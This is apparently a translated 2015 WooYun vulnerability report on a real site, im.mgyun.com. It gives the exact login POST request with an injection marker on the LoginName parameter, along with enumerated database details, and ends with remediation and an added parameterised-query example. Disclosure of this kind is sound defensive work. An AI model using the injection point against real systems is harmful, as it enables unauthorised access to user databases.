
MSSQL injection on a 刷机大师 (Shuaji Dashi) site (UNION supported)

2015-05-10 22:45

Injection point:

POST / HTTP/1.1
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://im.mgyun.com/
Cookie: ASP.NET_SessionId=
Host: im.mgyun.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

LoginName=test*&Password=test&VerifyCode=



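The LoginName parameter is injectable. UNION-based injection is supported, and error-based injection works as well.

Proof of vulnerability: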

mssqli_mgyun.jpg



current user: 'installmasteruser'

current db : 'InstallMaster'

Server Name : 'XINYI-104'

Databases:
available databases [38]:




Database: InstallMaster

[87 tables]


Remediation:

Filter and escape the parameters.
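The remediation above, as an added example that is not part of the original report or the site's code: a login lookup that concatenates LoginName into the SQL text, beside one that filters the value and binds it as a parameter. It assumes sqlite3 in place of MSSQL so it runs offline; the table, column names, allow-list pattern and function names are all constructed for illustration.

```python
import re
import sqlite3

LOGIN_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")  # assumed LoginName allow-list

def make_db():
    """Constructed stand-in for the login table (sqlite3 in place of MSSQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'hash-a')")
    return db

def login_concatenated(db, login_name, pw_hash):
    # Vulnerable pattern: LoginName becomes part of the SQL text, so a quote
    # in it changes the statement and the parser error reaches the caller.
    sql = ("SELECT login FROM users WHERE login = '" + login_name
           + "' AND pw_hash = '" + pw_hash + "'")
    return db.execute(sql).fetchall()

def find_user(db, login_name, pw_hash):
    # Bound parameters: the values never become SQL text.
    return db.execute("SELECT login FROM users WHERE login = ? AND pw_hash = ?",
                      (login_name, pw_hash)).fetchall()

def login_hardened(db, login_name, pw_hash):
    if not LOGIN_RE.fullmatch(login_name):   # filter before touching the DB
        return []
    try:
        return find_user(db, login_name, pw_hash)
    except sqlite3.Error:
        return []    # generic failure, no database error text for the client

def outcome(fn, db, login_name, pw_hash):
    """Rows returned by fn, or 'db-error' if the database rejected the SQL."""
    try:
        return fn(db, login_name, pw_hash)
    except sqlite3.Error:
        return "db-error"

if __name__ == "__main__":
    db = make_db()
    for name in ("alice", "test'"):          # second value: one stray quote
        for fn in (login_concatenated, find_user, login_hardened):
            print(repr(name), fn.__name__, outcome(fn, db, name, "hash-a"))
```

A single stray quote is enough to make the concatenated statement fail in the parser, which is the condition behind the error-based finding; the bound query treats the same value as an ordinary, non-matching login name.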

Source: www.wooyun.org/bugs/wooyun-2015-0103479
